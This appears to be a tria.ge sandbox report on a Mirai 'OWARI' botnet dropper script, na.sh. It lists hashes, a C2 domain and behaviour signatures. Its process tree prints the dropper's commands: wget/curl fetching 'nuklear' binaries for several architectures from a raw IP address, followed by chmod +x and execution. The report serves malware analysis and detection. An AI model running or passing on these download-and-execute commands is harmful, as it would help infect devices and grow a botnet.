Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    151s
  • max time network
    155s
  • platform
    debian-9_mipsel
  • resource
    debian9-mipsel-20240226-en
  • resource tags

    arch:mipselimage:debian9-mipsel-20240226-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem
  • submitted
    10/10/2024, 07:01

General

  • Target

    na.sh

  • Size

    2KB

  • MD5

    31eb41cbfbbd0e48aecbe2a689a34d71

  • SHA1

    a315bbb1681b97a156f747d3ab9f6d0f5694c475

  • SHA256

    5d8f0d7fc44dcd6e2488c1e37d9e31be38e558963a7b4531806c8c7d7004cdaa

  • SHA512

    50d60c823a9f5d88b21a7b7a5f3261c77ef635af545d0464c1114af51caa2b52f8a5764cfdcbd6587f84daa05db18f15132f61e7d384192fe1c8b18eab9d4ef4

Malware Config

Extracted

Family

mirai

Botnet

OWARI

C2

milnetbrasil.duckdns.org

Extracted

Family

mirai

Botnet

OWARI

C2

milnetbrasil.duckdns.org

Signatures

  • Mirai

    Mirai is a prevalent Linux malware infecting exposed network devices.

  • Contacts a large (86674) amount of remote hosts 1 TTPs

    This may indicate a network scan to discover remotely running services.

  • Creates a large amount of network flows 1 TTPs

    This may indicate a network scan to discover remotely running services.

  • File and Directory Permissions Modification 1 TTPs 6 IoCs

    Adversaries may modify file or directory permissions to evade defenses.

  • Executes dropped EXE 6 IoCs
  • Modifies Watchdog functionality 1 TTPs 8 IoCs

    Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.

  • Enumerates active TCP sockets 1 TTPs 4 IoCs

    Gets active TCP sockets from /proc virtual filesystem.

  • Changes its process name 4 IoCs
  • Reads system network configuration 1 TTPs 4 IoCs

    Uses contents of /proc filesystem to enumerate network settings.

  • Reads runtime system information 15 IoCs

    Reads data from /proc virtual filesystem.

  • System Network Configuration Discovery 1 TTPs 3 IoCs

    Adversaries may gather information about the network configuration of a system.

  • Writes file to tmp directory 12 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/na.sh
    /tmp/na.sh
    1⤵
    • Writes file to tmp directory
    PID:703
    • /usr/bin/wget
      wget http://81.161.238.213/389242390482/nuklear.x86
      2⤵
      • Writes file to tmp directory
      PID:705
    • /usr/bin/curl
      curl -O http://81.161.238.213/389242390482/nuklear.x86
      2⤵
      • Reads runtime system information
      • Writes file to tmp directory
      PID:717
    • /bin/cat
      cat nuklear.x86
      2⤵
        PID:728
      • /bin/chmod
        chmod +x na.sh nuklear.x86 payload systemd-private-ecb35f64e3d2458d8c255415f22330e6-systemd-timedated.service-JQ8EJP
        2⤵
        • File and Directory Permissions Modification
        PID:730
      • /tmp/payload
        ./payload payload
        2⤵
        • Executes dropped EXE
        PID:732
      • /usr/bin/wget
        wget http://81.161.238.213/389242390482/nuklear.mips
        2⤵
        • System Network Configuration Discovery
        • Writes file to tmp directory
        PID:734
      • /usr/bin/curl
        curl -O http://81.161.238.213/389242390482/nuklear.mips
        2⤵
        • Reads runtime system information
        • System Network Configuration Discovery
        • Writes file to tmp directory
        PID:737
      • /bin/cat
        cat nuklear.mips
        2⤵
        • System Network Configuration Discovery
        PID:738
      • /bin/chmod
        chmod +x na.sh nuklear.mips nuklear.x86 payload systemd-private-ecb35f64e3d2458d8c255415f22330e6-systemd-timedated.service-JQ8EJP
        2⤵
        • File and Directory Permissions Modification
        PID:739
      • /tmp/payload
        ./payload payload
        2⤵
        • Executes dropped EXE
        PID:740
      • /usr/bin/wget
        wget http://81.161.238.213/389242390482/nuklear.mpsl
        2⤵
        • Writes file to tmp directory
        PID:742
      • /usr/bin/curl
        curl -O http://81.161.238.213/389242390482/nuklear.mpsl
        2⤵
        • Reads runtime system information
        • Writes file to tmp directory
        PID:743
      • /bin/cat
        cat nuklear.mpsl
        2⤵
          PID:744
        • /bin/chmod
          chmod +x na.sh nuklear.mips nuklear.mpsl nuklear.x86 payload systemd-private-ecb35f64e3d2458d8c255415f22330e6-systemd-timedated.service-JQ8EJP
          2⤵
          • File and Directory Permissions Modification
          PID:745
        • /tmp/payload
          ./payload payload
          2⤵
          • Executes dropped EXE
          • Modifies Watchdog functionality
          • Enumerates active TCP sockets
          • Changes its process name
          • Reads system network configuration
          • Reads runtime system information
          PID:746
        • /usr/bin/wget
          wget http://81.161.238.213/389242390482/nuklear.arm4
          2⤵
            PID:750
          • /usr/bin/curl
            curl -O http://81.161.238.213/389242390482/nuklear.arm4
            2⤵
            • Reads runtime system information
            • Writes file to tmp directory
            PID:754
          • /bin/chmod
            chmod +x na.sh nuklear.arm4 nuklear.mips nuklear.mpsl nuklear.x86 payload systemd-private-ecb35f64e3d2458d8c255415f22330e6-systemd-timedated.service-JQ8EJP
            2⤵
            • File and Directory Permissions Modification
            PID:760
          • /tmp/payload
            ./payload payload
            2⤵
            • Executes dropped EXE
            • Modifies Watchdog functionality
            • Enumerates active TCP sockets
            • Changes its process name
            • Reads system network configuration
            • Reads runtime system information
            PID:761
          • /usr/bin/wget
            wget http://81.161.238.213/389242390482/nuklear.arm5
            2⤵
            • Writes file to tmp directory
            PID:769
          • /usr/bin/curl
            curl -O http://81.161.238.213/389242390482/nuklear.arm5
            2⤵
            • Reads runtime system information
            • Writes file to tmp directory
            PID:778
          • /bin/chmod
            chmod +x na.sh nuklear.arm4 nuklear.arm5 nuklear.mips nuklear.mpsl nuklear.x86 payload
            2⤵
            • File and Directory Permissions Modification
            PID:795
          • /tmp/payload
            ./payload payload
            2⤵
            • Executes dropped EXE
            • Modifies Watchdog functionality
            • Enumerates active TCP sockets
            • Changes its process name
            • Reads system network configuration
            • Reads runtime system information
            PID:796
          • /usr/bin/wget
            wget http://81.161.238.213/389242390482/nuklear.arm6
            2⤵
            • Writes file to tmp directory
            PID:801
          • /usr/bin/curl
            curl -O http://81.161.238.213/389242390482/nuklear.arm6
            2⤵
            • Reads runtime system information
            • Writes file to tmp directory
            PID:811
          • /bin/chmod
            chmod +x na.sh nuklear.arm4 nuklear.arm5 nuklear.arm6 nuklear.mips nuklear.mpsl nuklear.x86 payload
            2⤵
            • File and Directory Permissions Modification
            PID:826
          • /tmp/payload
            ./payload payload
            2⤵
            • Executes dropped EXE
            • Modifies Watchdog functionality
            • Enumerates active TCP sockets
            • Changes its process name
            • Reads system network configuration
            • Reads runtime system information
            PID:827
          • /usr/bin/wget
            wget http://81.161.238.213/389242390482/nuklear.arm7
            2⤵
              PID:834

          Network

          MITRE ATT&CK Enterprise v15

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • /tmp/nuklear.x86

            Filesize

            48KB

            MD5

            0f8078b069cb47510559b035bd452768

            SHA1

            7f035898a85f0bd74bae61e5e7f88f3d7f91a625

            SHA256

            f5544913e371f3f4b59591c735aabecf555877932afa77a9cb19fa3185f3c0e3

            SHA512

            2ff5c2199e690869f6a56468ba56adc0d6d949bd77f01ad4e5030f6d2b2d14a9f916c82e290f24c6c778d8f2e7bbd9563d2228a038efda536425eb1710a93c87

          • /tmp/payload

            Filesize

            66KB

            MD5

            f40f75ef70fe1828f474e793ee1b65b8

            SHA1

            19d54dfdb398bccb76847fbe807c0f4017f8c75a

            SHA256

            fecae0a43b30d8196123cc4e148a5ecfce6ae06548c0d7b081c4ebbdcb9a93dc

            SHA512

            4ed084ee10ddad9085dc5dfd50573dafdae4f61048e3c7a1395328b13cf65a90199ddfab661ef4161d68bc34f34e45ca3d1744c0bcb89e23173a1a6ef2f4750f

          • /tmp/payload

            Filesize

            69KB

            MD5

            f425fff657e00dafd95e0555a67cfaa5

            SHA1

            077fb30cacdb8bd7860b0feac5cf3240593a0770

            SHA256

            bb463c4a9d2b8cb78017bfa881021a873265546a833eb995491a02feda91ecf3

            SHA512

            ae12fc824408615d900cb32beedcabf00193b6d30002da14c50c231ff0cd6273866dccfa0b29a249cc28f8699f29cf555abcfb4b3de6626bac0aa3b7f2b7b3ec